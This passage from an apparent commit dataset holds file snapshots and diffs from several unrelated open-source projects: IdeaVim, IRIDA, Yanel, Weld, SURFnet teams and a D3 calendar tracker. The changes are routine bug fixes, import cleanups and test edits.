VimPlugin.getChange().insertText(editor, caret, "\n"); ++endOffset; } else { if (pad.length() > 0) { MotionGroup.moveCaret(editor, caret, insertOffset); VimPlugin.getChange().insertText(editor, caret, pad); endOffset += pad.length(); } } ++currentLine; } return endOffset; } private int putTextInternal(@NotNull Editor editor, @NotNull Caret caret, @NotNull String text, int startOffset, int count) { MotionGroup.moveCaret(editor, caret, startOffset); for (int i = 0; i < count; i++) { //TODO: change to stringbuilder? VimPlugin.getChange().insertText(editor, caret, text); } return startOffset + text.length() * count; } private int getStartOffset(@NotNull Editor editor, @NotNull Caret caret, SelectionType type, boolean beforeCursor) { if (beforeCursor) { return type == SelectionType.LINE_WISE ? VimPlugin.getMotion().moveCaretToLineStart(editor, caret) : caret.getOffset(); } int startOffset; if (type == SelectionType.LINE_WISE) { startOffset = Math.min(editor.getDocument().getTextLength(), VimPlugin.getMotion().moveCaretToLineEnd(editor, caret) + 1); if (startOffset > 0 && startOffset == editor.getDocument().getTextLength() && editor.getDocument().getCharsSequence().charAt(startOffset - 1) != '\n') { editor.getDocument().insertString(startOffset, "\n"); startOffset++; } } else { startOffset = caret.getOffset(); if (!EditorHelper.isLineEmpty(editor, caret.getLogicalPosition().line, false)) { startOffset++; } } if (startOffset > 0 && startOffset > editor.getDocument().getTextLength()) return startOffset - 1; return startOffset; } private void moveCaret(@NotNull Editor editor, @NotNull Caret caret, @NotNull SelectionType type, @NotNull CommandState.SubMode mode, int startOffset, boolean cursorAfter, int endOffset) { int cursorMode; if (type == SelectionType.BLOCK_WISE) { if (mode == CommandState.SubMode.VISUAL_LINE) { cursorMode = cursorAfter ? 4 : 1; } else { cursorMode = cursorAfter ? 5 : 1; } } else if (type == SelectionType.LINE_WISE) { if (mode == CommandState.SubMode.VISUAL_LINE) { cursorMode = cursorAfter ? 4 : 3; } else { cursorMode = cursorAfter ? 4 : 3; } } else /* Characterwise */ { if (mode == CommandState.SubMode.VISUAL_LINE) { cursorMode = cursorAfter ? 4 : 1; } else { cursorMode = cursorAfter ? 5 : 2; } } switch (cursorMode) { case 1: MotionGroup.moveCaret(editor, caret, startOffset); break; case 2: MotionGroup.moveCaret(editor, caret, endOffset - 1); break; case 3: MotionGroup.moveCaret(editor, caret, startOffset); MotionGroup.moveCaret(editor, caret, VimPlugin.getMotion().moveCaretToLineStartSkipLeading(editor, caret)); break; case 4: MotionGroup.moveCaret(editor, caret, endOffset + 1); break; case 5: int pos = Math.min(endOffset, EditorHelper.getLineEndForOffset(editor, endOffset - 1) - 1); MotionGroup.moveCaret(editor, caret, pos); break; } } private int doIndent(@NotNull Editor editor, @NotNull Caret caret, @NotNull DataContext context, int startOffset, int endOffset) { final int startLine = editor.offsetToLogicalPosition(startOffset).line; final int endLine = editor.offsetToLogicalPosition(endOffset - 1).line; final int startLineOffset = editor.getDocument().getLineStartOffset(startLine); final int endLineOffset = editor.getDocument().getLineEndOffset(endLine); VimPlugin.getChange().autoIndentRange(editor, caret, context, new TextRange(startLineOffset, endLineOffset)); return EditorHelper.getLineEndOffset(editor, endLine, true); } private int getMaxSegmentLength(@NotNull String text) { final StringTokenizer tokenizer = new StringTokenizer(text, "\n"); int maxLen = 0; while (tokenizer.hasMoreTokens()) { final String s = tokenizer.nextToken(); maxLen = Math.max(s.length(), maxLen); } return maxLen; } @NotNull private TextRange getTextRange(@NotNull List<Pair<Integer, Integer>> ranges, @NotNull SelectionType type) { final int size = ranges.size(); final int[] starts = new int[size]; final int[] ends = new int[size]; switch (type) { case LINE_WISE: starts[size - 1] = ranges.get(size - 1).first; ends[size - 1] = ranges.get(size - 1).second; for (int i = 0; i < size - 1; i++) { final Pair<Integer, Integer> range = ranges.get(i); starts[i] = range.first; ends[i] = range.second - 1; } break; case CHARACTER_WISE: for (int i = 0; i < size; i++) { final Pair<Integer, Integer> range = ranges.get(i); starts[i] = range.first; ends[i] = range.second; } break; case BLOCK_WISE: assert ranges.size() == 1; } return new TextRange(starts, ends); } private boolean yankRange(@NotNull Editor editor, @NotNull TextRange range, @NotNull SelectionType type, @Nullable Map<Caret, Integer> startOffsets) { if (startOffsets != null) startOffsets.forEach((caret, offset) -> MotionGroup.moveCaret(editor, caret, offset)); return VimPlugin.getRegister().storeText(editor, range, type, false); } }
Put text bug fixed
src/com/maddyhome/idea/vim/group/CopyGroup.java
Put text bug fixed
<ide><path>rc/com/maddyhome/idea/vim/group/CopyGroup.java <ide> <ide> final int lineCount = StringUtil.getLineBreakCount(text) + 1; <ide> if (currentLine + lineCount >= EditorHelper.getLineCount(editor)) { <del> for (int i = 0; i < currentLine + lineCount - EditorHelper.getLineCount(editor); i++) { <add> final int limit = currentLine + lineCount - EditorHelper.getLineCount(editor); <add> for (int i = 0; i < limit; i++) { <ide> MotionGroup.moveCaret(editor, caret, EditorHelper.getFileSize(editor, true)); <ide> VimPlugin.getChange().insertText(editor, caret, "\n"); <ide> }
Java
apache-2.0
error: pathspec 'src/test/java/ca/corefacility/bioinformatics/irida/ria/unit/web/SequencingRunControllerTest.java' did not match any file(s) known to git
e1d6153a1490b1a9fa7a6c48f74e2a1d773e6d9f
1
phac-nml/irida,phac-nml/irida,phac-nml/irida,phac-nml/irida,phac-nml/irida,phac-nml/irida,phac-nml/irida,phac-nml/irida
package ca.corefacility.bioinformatics.irida.ria.unit.web; import static org.junit.Assert.assertEquals; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.verify; import static org.mockito.Mockito.when; import java.util.List; import org.junit.Before; import org.junit.Test; import ca.corefacility.bioinformatics.irida.model.SequencingRunEntity; import ca.corefacility.bioinformatics.irida.model.run.SequencingRun; import ca.corefacility.bioinformatics.irida.ria.web.SequencingRunController; import ca.corefacility.bioinformatics.irida.service.SequencingRunService; import com.google.common.collect.Lists; public class SequencingRunControllerTest { private SequencingRunController controller; private SequencingRunService sequencingRunService; @Before public void setup() { sequencingRunService = mock(SequencingRunService.class); controller = new SequencingRunController(sequencingRunService); } @Test public void testGetListPage() { assertEquals(SequencingRunController.LIST_VIEW, controller.getListPage()); } @Test public void testGetSequencingRuns() { List<SequencingRun> runs = Lists.newArrayList(new SequencingRunEntity()); when(sequencingRunService.findAll()).thenReturn(runs); Iterable<SequencingRun> sequencingRuns = controller.getSequencingRuns(); verify(sequencingRunService).findAll(); assertEquals(sequencingRuns, runs); } }
src/test/java/ca/corefacility/bioinformatics/irida/ria/unit/web/SequencingRunControllerTest.java
added most boring test
src/test/java/ca/corefacility/bioinformatics/irida/ria/unit/web/SequencingRunControllerTest.java
added most boring test
<ide><path>rc/test/java/ca/corefacility/bioinformatics/irida/ria/unit/web/SequencingRunControllerTest.java <add>package ca.corefacility.bioinformatics.irida.ria.unit.web; <add> <add>import static org.junit.Assert.assertEquals; <add>import static org.mockito.Mockito.mock; <add>import static org.mockito.Mockito.verify; <add>import static org.mockito.Mockito.when; <add> <add>import java.util.List; <add> <add>import org.junit.Before; <add>import org.junit.Test; <add> <add>import ca.corefacility.bioinformatics.irida.model.SequencingRunEntity; <add>import ca.corefacility.bioinformatics.irida.model.run.SequencingRun; <add>import ca.corefacility.bioinformatics.irida.ria.web.SequencingRunController; <add>import ca.corefacility.bioinformatics.irida.service.SequencingRunService; <add> <add>import com.google.common.collect.Lists; <add> <add>public class SequencingRunControllerTest { <add> private SequencingRunController controller; <add> <add> private SequencingRunService sequencingRunService; <add> <add> @Before <add> public void setup() { <add> sequencingRunService = mock(SequencingRunService.class); <add> controller = new SequencingRunController(sequencingRunService); <add> } <add> <add> @Test <add> public void testGetListPage() { <add> assertEquals(SequencingRunController.LIST_VIEW, controller.getListPage()); <add> } <add> <add> @Test <add> public void testGetSequencingRuns() { <add> List<SequencingRun> runs = Lists.newArrayList(new SequencingRunEntity()); <add> when(sequencingRunService.findAll()).thenReturn(runs); <add> Iterable<SequencingRun> sequencingRuns = controller.getSequencingRuns(); <add> verify(sequencingRunService).findAll(); <add> assertEquals(sequencingRuns, runs); <add> } <add>}
Java
apache-2.0
195d00308576065420af92c361522ee8fcb94ff0
0
baszero/yanel,baszero/yanel,wyona/yanel,baszero/yanel,baszero/yanel,baszero/yanel,wyona/yanel,wyona/yanel,wyona/yanel,wyona/yanel,baszero/yanel,wyona/yanel
/* * Copyright 2006 Wyona * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.wyona.org/licenses/APACHE-LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.wyona.yanel.core.api.attributes; import javax.servlet.http.HttpServletRequest; import org.wyona.yanel.core.api.attributes.CreatableV1; import java.util.HashMap; /** * DEV (not released yet), please be aware that this interface still might change ... */ public interface CreatableV2 extends CreatableV1 { public static String TYPE_UPLOAD = "type_upload"; public static String TYPE_STRING = "type_string"; public static String TYPE_SELECT = "type_select"; public static String TYPE_PASSWORD = "type_password"; /** * Get property type which is intended to be used for the different types of (XHTML) input fields, e.g. TYPE_UPLOAD, TYPE_STRING (also see CreatableV1.getPropertyNames() */ public String getPropertyType(String propertyName); /** * Creates the resource */ public void create(HttpServletRequest request); /** * Get resource configuration properties which shall be used for the new resource configuration of the new resource */ public HashMap createRTIProperties(HttpServletRequest request); /** * Allows overwriting the name for the new resource which is suggested by Yanel or rather by the user input. This is useful if one wants to dynamically generate names which are for instance based on a timestamp. Return null if the resource shall not be associated with a resource configuration. This can useful for resources which are used "internally", e.g. the Yanel-User resource. */ public String getCreateName(String suggestedName); }
src/core/java/org/wyona/yanel/core/api/attributes/CreatableV2.java
/* * Copyright 2006 Wyona * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.wyona.org/licenses/APACHE-LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.wyona.yanel.core.api.attributes; import javax.servlet.http.HttpServletRequest; import org.wyona.yanel.core.Path; import org.wyona.yanel.core.api.attributes.CreatableV1; import java.util.HashMap; /** * DEV (not released yet), please be aware that this interface still might change ... */ public interface CreatableV2 extends CreatableV1 { public static String TYPE_UPLOAD = "type_upload"; public static String TYPE_STRING = "type_string"; public static String TYPE_SELECT = "type_select"; public static String TYPE_PASSWORD = "type_password"; /** * Get property type which is intended to be used for the different types of (XHTML) input fields, e.g. TYPE_UPLOAD, TYPE_STRING (also see CreatableV1.getPropertyNames() */ public String getPropertyType(String propertyName); /** * Creates the resource */ public void create(HttpServletRequest request); /** * Get resource configuration properties which shall be used for the new resource configuration of the new resource */ public HashMap createRTIProperties(HttpServletRequest request); /** * Allows overwriting the name for the new resource which is suggested by Yanel or rather by the user input. This is useful if one wants to dynamically generate names which are for instance based on a timestamp. Return null if the resource shall not be associated with a resource configuration. This can useful for resources which are used "internally", e.g. the Yanel-User resource. */ public String getCreateName(String suggestedName); }
obsolete import removed
src/core/java/org/wyona/yanel/core/api/attributes/CreatableV2.java
obsolete import removed
<ide><path>rc/core/java/org/wyona/yanel/core/api/attributes/CreatableV2.java <ide> package org.wyona.yanel.core.api.attributes; <ide> <ide> import javax.servlet.http.HttpServletRequest; <del> <del>import org.wyona.yanel.core.Path; <ide> import org.wyona.yanel.core.api.attributes.CreatableV1; <del> <ide> import java.util.HashMap; <ide> <ide> /**
JavaScript
apache-2.0
c8a93a81cb0ce4fd4cfaf434eb13054a2189fc9d
0
jhfjhfj1/github_io_source,jhfjhfj1/github_io_source,jhfjhfj1/github_io_source
var data_array={ "20160426":7, "20160426":6, "20160425":6, "20160424":1.5, "20160423":0.5, "20160422":3, "20160421":7, "20160420":7, "20160419":3, "20160418":7, "20160417":7, "20160416":0, "20160415":5.5, "20160414":7, "20160413":7, "20160412":3, "20160411":7, "20160410":5, "20160409":2, "20160408":7, "20160407":7, "20160406":7, "20160405":7, "20160404":7, "20160403":0, "20160402":2.5, "20160401":7, "20160331":7, "20160330":7, "20160329":7, "20160328":7, "20160327":4.5, "20160326":2, "20160325":5.5, "20160324":5, "20160323":4, "20160322":2.5, "20160321":5.5, "20160320":2, "20160319":0.5, "20160318":6, "20160317":0, "20160316":0, "20160315":1.5, "20160314":0, "20160313":2, "20160312":2, "20160311":0, "20160310":5, "20160309":1, "20160308":0, "20160307":5, "20160306":7, "20160305":3, "20160304":6, "20160303":3, "20160302":6, "20160301":7, "20160229":7, "20160228":7, "20160227":3, "20160226":2, "20160225":2.5, "20160224":5.5, "20160223":5, "20160222":7, "20160221":3.5, "20160220":3, "20160219":7, "20160218":7, "20160217":6, "20160216":5.5, "20160215":6, "20160214":3.5, "20160213":0, "20160212":4, "20160211":5, "20160210":7, "20160209":6, "20160208":5, "20160207":0, "20160206":0, "20160205":3, "20160204":5, "20160203":5, "20160202":4, "20160201":6, "20160131":3, "20160130":0, "20160129":7, "20160128":7, "20160127":6.5, "20160126":5, "20160125":7, "20160124":3, "20160123":0, "20160122":7, "20160121":7, "20160120":7, "20160119":6, "20160118":5, "20160117":0, "20160116":1, "20160115":4, "20160114":5, "20160113":5, "20160112":5, "20160111":5, "20160110":3, "20160109":0, "20160108":5.5, "20160107":5, "20160106":5, "20160105":5, "20160104":4.5, "20160103":0, "20160102":2, "20160101":0, "20151231":0, "20151230":1.5, "20151229":2, "20151228":2, "20151227":3.5, "20151226":1.5, "20151225":0, "20151224":0, "20151223":2.5, "20151222":3, "20151221":2, "20151220":4, "20151219":2, "20151218":4, "20151217":4.5, "20151216":4, "20151215":4, "20151214":5, "20151213":4, "20151212":4, "20151211":4.5, "20151210":7, "20151209":6, "20151208":5, "20151207":7, "20151206":4, "20151205":7, "20151204":4, "20151203":5.5, "20151202":6, "20151201":4.5, "20151130":5, "20151129":4, "20151128":4 }; var width = 900, height = 120, cellSize = 15; // cell size month = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec'] color = ["#eee","#d6e685","#8cc665","#44a340","#1e6823"]; range = [0,4,5,7]; var day = d3.time.format("%w"), week = d3.time.format("%U"), percent = d3.format(".1%"), format = d3.time.format("%Y%m%d"); parseDate = d3.time.format("%Y%m%d").parse; var svg = d3.select(".calender-map").selectAll("svg") .data(d3.range(2015, 2017)) .enter().append("svg") .attr("width", '100%') .attr("data-height", '0.5678') .attr("viewBox",'0 0 ' + width + ' ' + height) .append("g") .attr("transform", "translate(" + ((width - cellSize * 53) / 2) + "," + (height - cellSize * 7 - 1) + ")"); svg.append("text") .attr("transform", "translate(-10," + cellSize * 3.5 + ")rotate(-90)") .style("text-anchor", "middle") .text(function(d) { return d; }); var rect = svg.selectAll(".day") .data(function(d) { return d3.time.days(new Date(d, 0, 1), new Date(d + 1, 0, 1)); }) .enter() .append("rect") .attr("class", "day") .attr("width", cellSize) .attr("height", cellSize) .attr("x", function(d) { return week(d) * cellSize; }) .attr("y", function(d) { return day(d) * cellSize; }) .attr("fill",'#fff') .datum(format); var legend = svg.selectAll(".legend") .data(month) .enter().append("g") .attr("class", "legend") .attr("transform", function(d, i) { return "translate(" + (((i+1) * 50)+8) + ",0)"; }); svg.selectAll(".month") .data(function(d) { return d3.time.months(new Date(d, 0, 1), new Date(d + 1, 0, 1)); }) .enter().append("path") .attr("class", "month") .attr("d", monthPath); function getRange(d) { for (i = 1; i < range.length; i++) { if (d < range[i]) return i; } return -1; } function getColor(d) { if (d == 0) return color[0]; if (d >= range[range.length - 1]) return color[range.length]; index = getRange(d); change = d3.scale.linear().range([color[index - 1], color[index]]) .domain([range[index - 1], range[index]]) return change(d) } rect .attr("fill", function(d) {if (isNaN(data_array[d])) return color[0]; return getColor(data_array[d]); }) .attr("data-title", function(d) { if (isNaN(data_array[d])) ret = "No record on "; else ret = data_array[d] + " hours on "; return ret + month[parseDate(d).getMonth()] + ". " + parseDate(d).getDate()}); d3.csv("",function() { $("rect").tooltip({container: 'body'}); }); function numberWithCommas(x) { x = x.toString(); var pattern = /(-?\d+)(\d{3})/; while (pattern.test(x)) x = x.replace(pattern, "$1,$2"); return x; } function monthPath(t0) { var t1 = new Date(t0.getFullYear(), t0.getMonth() + 1, 0), d0 = +day(t0), w0 = +week(t0), d1 = +day(t1), w1 = +week(t1); return "M" + (w0 + 1) * cellSize + "," + d0 * cellSize + "H" + w0 * cellSize + "V" + 7 * cellSize + "H" + w1 * cellSize + "V" + (d1 + 1) * cellSize + "H" + (w1 + 1) * cellSize + "V" + 0 + "H" + (w0 + 1) * cellSize + "Z"; }
home/js/calendermap.js
var data_array={ "20160425":6, "20160424":1.5, "20160423":0.5, "20160422":3, "20160421":7, "20160420":7, "20160419":3, "20160418":7, "20160417":7, "20160416":0, "20160415":5.5, "20160414":7, "20160413":7, "20160412":3, "20160411":7, "20160410":5, "20160409":2, "20160408":7, "20160407":7, "20160406":7, "20160405":7, "20160404":7, "20160403":0, "20160402":2.5, "20160401":7, "20160331":7, "20160330":7, "20160329":7, "20160328":7, "20160327":4.5, "20160326":2, "20160325":5.5, "20160324":5, "20160323":4, "20160322":2.5, "20160321":5.5, "20160320":2, "20160319":0.5, "20160318":6, "20160317":0, "20160316":0, "20160315":1.5, "20160314":0, "20160313":2, "20160312":2, "20160311":0, "20160310":5, "20160309":1, "20160308":0, "20160307":5, "20160306":7, "20160305":3, "20160304":6, "20160303":3, "20160302":6, "20160301":7, "20160229":7, "20160228":7, "20160227":3, "20160226":2, "20160225":2.5, "20160224":5.5, "20160223":5, "20160222":7, "20160221":3.5, "20160220":3, "20160219":7, "20160218":7, "20160217":6, "20160216":5.5, "20160215":6, "20160214":3.5, "20160213":0, "20160212":4, "20160211":5, "20160210":7, "20160209":6, "20160208":5, "20160207":0, "20160206":0, "20160205":3, "20160204":5, "20160203":5, "20160202":4, "20160201":6, "20160131":3, "20160130":0, "20160129":7, "20160128":7, "20160127":6.5, "20160126":5, "20160125":7, "20160124":3, "20160123":0, "20160122":7, "20160121":7, "20160120":7, "20160119":6, "20160118":5, "20160117":0, "20160116":1, "20160115":4, "20160114":5, "20160113":5, "20160112":5, "20160111":5, "20160110":3, "20160109":0, "20160108":5.5, "20160107":5, "20160106":5, "20160105":5, "20160104":4.5, "20160103":0, "20160102":2, "20160101":0, "20151231":0, "20151230":1.5, "20151229":2, "20151228":2, "20151227":3.5, "20151226":1.5, "20151225":0, "20151224":0, "20151223":2.5, "20151222":3, "20151221":2, "20151220":4, "20151219":2, "20151218":4, "20151217":4.5, "20151216":4, "20151215":4, "20151214":5, "20151213":4, "20151212":4, "20151211":4.5, "20151210":7, "20151209":6, "20151208":5, "20151207":7, "20151206":4, "20151205":7, "20151204":4, "20151203":5.5, "20151202":6, "20151201":4.5, "20151130":5, "20151129":4, "20151128":4 }; var width = 900, height = 120, cellSize = 15; // cell size month = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec'] color = ["#eee","#d6e685","#8cc665","#44a340","#1e6823"]; range = [0,4,5,7]; var day = d3.time.format("%w"), week = d3.time.format("%U"), percent = d3.format(".1%"), format = d3.time.format("%Y%m%d"); parseDate = d3.time.format("%Y%m%d").parse; var svg = d3.select(".calender-map").selectAll("svg") .data(d3.range(2015, 2017)) .enter().append("svg") .attr("width", '100%') .attr("data-height", '0.5678') .attr("viewBox",'0 0 ' + width + ' ' + height) .append("g") .attr("transform", "translate(" + ((width - cellSize * 53) / 2) + "," + (height - cellSize * 7 - 1) + ")"); svg.append("text") .attr("transform", "translate(-10," + cellSize * 3.5 + ")rotate(-90)") .style("text-anchor", "middle") .text(function(d) { return d; }); var rect = svg.selectAll(".day") .data(function(d) { return d3.time.days(new Date(d, 0, 1), new Date(d + 1, 0, 1)); }) .enter() .append("rect") .attr("class", "day") .attr("width", cellSize) .attr("height", cellSize) .attr("x", function(d) { return week(d) * cellSize; }) .attr("y", function(d) { return day(d) * cellSize; }) .attr("fill",'#fff') .datum(format); var legend = svg.selectAll(".legend") .data(month) .enter().append("g") .attr("class", "legend") .attr("transform", function(d, i) { return "translate(" + (((i+1) * 50)+8) + ",0)"; }); svg.selectAll(".month") .data(function(d) { return d3.time.months(new Date(d, 0, 1), new Date(d + 1, 0, 1)); }) .enter().append("path") .attr("class", "month") .attr("d", monthPath); function getRange(d) { for (i = 1; i < range.length; i++) { if (d < range[i]) return i; } return -1; } function getColor(d) { if (d == 0) return color[0]; if (d >= range[range.length - 1]) return color[range.length]; index = getRange(d); change = d3.scale.linear().range([color[index - 1], color[index]]) .domain([range[index - 1], range[index]]) return change(d) } rect .attr("fill", function(d) {if (isNaN(data_array[d])) return color[0]; return getColor(data_array[d]); }) .attr("data-title", function(d) { if (isNaN(data_array[d])) ret = "No record on "; else ret = data_array[d] + " hours on "; return ret + month[parseDate(d).getMonth()] + ". " + parseDate(d).getDate()}); d3.csv("",function() { $("rect").tooltip({container: 'body'}); }); function numberWithCommas(x) { x = x.toString(); var pattern = /(-?\d+)(\d{3})/; while (pattern.test(x)) x = x.replace(pattern, "$1,$2"); return x; } function monthPath(t0) { var t1 = new Date(t0.getFullYear(), t0.getMonth() + 1, 0), d0 = +day(t0), w0 = +week(t0), d1 = +day(t1), w1 = +week(t1); return "M" + (w0 + 1) * cellSize + "," + d0 * cellSize + "H" + w0 * cellSize + "V" + 7 * cellSize + "H" + w1 * cellSize + "V" + (d1 + 1) * cellSize + "H" + (w1 + 1) * cellSize + "V" + 0 + "H" + (w0 + 1) * cellSize + "Z"; }
tracker
home/js/calendermap.js
tracker
<ide><path>ome/js/calendermap.js <ide> var data_array={ <add>"20160426":7, <add>"20160426":6, <ide> "20160425":6, <ide> "20160424":1.5, <ide> "20160423":0.5,
Java
apache-2.0
0af89702f6a188303ce33487ed75bb7259fd4597
0
weld/core,manovotn/core,antoinesd/weld-core,antoinesd/weld-core,manovotn/core,weld/core,antoinesd/weld-core,manovotn/core
/* * JBoss, Home of Professional Open Source * Copyright 2008, Red Hat Middleware LLC, and individual contributors * by the @authors tag. See the copyright.txt in the distribution for a * full listing of individual contributors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * http://www.apache.org/licenses/LICENSE-2.0 * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.jboss.webbeans.ejb; import javax.annotation.PostConstruct; import javax.annotation.PreDestroy; import javax.interceptor.InvocationContext; import javax.webbeans.manager.Bean; import org.jboss.webbeans.CurrentManager; import org.jboss.webbeans.bean.EnterpriseBean; /** * Interceptor for handling EJB post-construct tasks * * @author Pete Muir */ public class SessionBeanInterceptor { /** * Gets the underlying target and calls the post-construct method * * @param invocationContext The invocation context * @throws Exception */ @PostConstruct public void postConstruct(InvocationContext invocationContext) throws Exception { EnterpriseBean<Object> enterpriseBean = getBean(invocationContext); if (enterpriseBean != null) { enterpriseBean.postConstruct(invocationContext.getTarget()); } invocationContext.proceed(); } /** * Gets the underlying target and calls the pre-destroy method * * @param invocationContext The invocation context * @throws Exception */ @PreDestroy public void preDestroy(InvocationContext invocationContext) throws Exception { EnterpriseBean<Object> enterpriseBean = getBean(invocationContext); if (enterpriseBean != null) { enterpriseBean.preDestroy(invocationContext.getTarget()); } invocationContext.proceed(); } /** * Gets a bean based on the target in the invocation context * * @param invocationContext The invocation context * @return The found bean or null if the bean was not an enterprise bean */ @SuppressWarnings("unchecked") private static EnterpriseBean<Object> getBean(InvocationContext invocationContext) { Class<?> beanClass = invocationContext.getTarget().getClass(); Bean<?> bean = CurrentManager.rootManager().getBeanMap().get(beanClass); if (bean instanceof EnterpriseBean) { return (EnterpriseBean<Object>) bean; } else { return null; } } }
webbeans-ri/src/main/java/org/jboss/webbeans/ejb/SessionBeanInterceptor.java
/* * JBoss, Home of Professional Open Source * Copyright 2008, Red Hat Middleware LLC, and individual contributors * by the @authors tag. See the copyright.txt in the distribution for a * full listing of individual contributors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * http://www.apache.org/licenses/LICENSE-2.0 * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.jboss.webbeans.ejb; import javax.annotation.PostConstruct; import javax.annotation.PreDestroy; import javax.interceptor.InvocationContext; import javax.webbeans.manager.Bean; import org.jboss.webbeans.CurrentManager; import org.jboss.webbeans.bean.EnterpriseBean; /** * Interceptor for handling EJB post-construct tasks * * @author Pete Muir */ public class SessionBeanInterceptor { /** * Gets the underlying target and calls the post-construct method * * @param invocationContext The invocation context */ @PostConstruct public void postConstruct(InvocationContext invocationContext) { EnterpriseBean<Object> enterpriseBean = getBean(invocationContext); if (enterpriseBean != null) { enterpriseBean.postConstruct(invocationContext.getTarget()); } } /** * Gets the underlying target and calls the pre-destroy method * * @param invocationContext The invocation context */ @PreDestroy public void preDestroy(InvocationContext invocationContext) { EnterpriseBean<Object> enterpriseBean = getBean(invocationContext); if (enterpriseBean != null) { enterpriseBean.preDestroy(invocationContext.getTarget()); } } /** * Gets a bean based on the target in the invocation context * * @param invocationContext The invocation context * @return The found bean or null if the bean was not an enterprise bean */ @SuppressWarnings("unchecked") private static EnterpriseBean<Object> getBean(InvocationContext invocationContext) { Class<?> beanClass = invocationContext.getTarget().getClass(); Bean<?> bean = CurrentManager.rootManager().getBeanMap().get(beanClass); if (bean instanceof EnterpriseBean) { return (EnterpriseBean<Object>) bean; } else { return null; } } }
WBRI-91 git-svn-id: 811cd8a17a8c3c0c263af499002feedd54a892d0@781 1c488680-804c-0410-94cd-c6b725194a0e
webbeans-ri/src/main/java/org/jboss/webbeans/ejb/SessionBeanInterceptor.java
WBRI-91
<ide><path>ebbeans-ri/src/main/java/org/jboss/webbeans/ejb/SessionBeanInterceptor.java <ide> * Gets the underlying target and calls the post-construct method <ide> * <ide> * @param invocationContext The invocation context <add> * @throws Exception <ide> */ <ide> @PostConstruct <del> public void postConstruct(InvocationContext invocationContext) <add> public void postConstruct(InvocationContext invocationContext) throws Exception <ide> { <ide> EnterpriseBean<Object> enterpriseBean = getBean(invocationContext); <ide> if (enterpriseBean != null) <ide> { <ide> enterpriseBean.postConstruct(invocationContext.getTarget()); <ide> } <add> invocationContext.proceed(); <ide> } <ide> <ide> /** <ide> * Gets the underlying target and calls the pre-destroy method <ide> * <ide> * @param invocationContext The invocation context <add> * @throws Exception <ide> */ <ide> @PreDestroy <del> public void preDestroy(InvocationContext invocationContext) <add> public void preDestroy(InvocationContext invocationContext) throws Exception <ide> { <ide> EnterpriseBean<Object> enterpriseBean = getBean(invocationContext); <ide> if (enterpriseBean != null) <ide> { <ide> enterpriseBean.preDestroy(invocationContext.getTarget()); <ide> } <add> invocationContext.proceed(); <ide> } <ide> <ide> /**
Java
apache-2.0
4fc4b341f70144f2954d1d0ea94d2da4103220a6
0
OpenConext/OpenConext-teams,OpenConext/OpenConext-teams,OpenConext/OpenConext-teams
/* * Copyright 2011 SURFnet bv, The Netherlands * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package nl.surfnet.coin.teams.util; import nl.surfnet.coin.teams.control.AbstractControllerTest; import org.junit.Ignore; import org.junit.Test; import static org.junit.Assert.assertEquals; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; /** * */ public class VOUtilTest extends AbstractControllerTest { private final static String VONAME = "testvo.nl"; private final static String DEFAULTSTEM = "nl:surfnet:diensten"; private final static String VOSTEMPREFIX = "nl:surfnet:vo"; /** * Mock the getVOName. * * @throws Exception */ @Test @Ignore //TODO fix test. Mock Static method VOInterceptor.getUserVo Otherwise the outcome of this test is not predictable! public void testGetVoName() throws Exception { VOUtil voUtil = new VOUtil(); TeamEnvironment environment = mock(TeamEnvironment.class); when(environment.getVoStemPrefix()).thenReturn(VOSTEMPREFIX); when(environment.getDefaultStemName()).thenReturn(DEFAULTSTEM); autoWireMock(voUtil, environment, TeamEnvironment.class); String stemName = voUtil.getStemName(getRequest()); assertEquals("nl:surfnet:diensten", stemName); } }
coin-teams-war/src/test/java/nl/surfnet/coin/teams/util/VOUtilTest.java
/* * Copyright 2011 SURFnet bv, The Netherlands * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package nl.surfnet.coin.teams.util; import nl.surfnet.coin.teams.control.AbstractControllerTest; import static org.junit.Assert.assertEquals; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; /** * */ public class VOUtilTest extends AbstractControllerTest { private final static String VONAME = "testvo.nl"; private final static String DEFAULTSTEM = "nl:surfnet:diensten"; private final static String VOSTEMPREFIX = "nl:surfnet:vo"; /** * Mock the getVOName. * * @throws Exception */ //@Test //TODO fix test. Mock Static method VOInterceptor.getUserVo Otherwise the outcome of this test is not predictable! public void 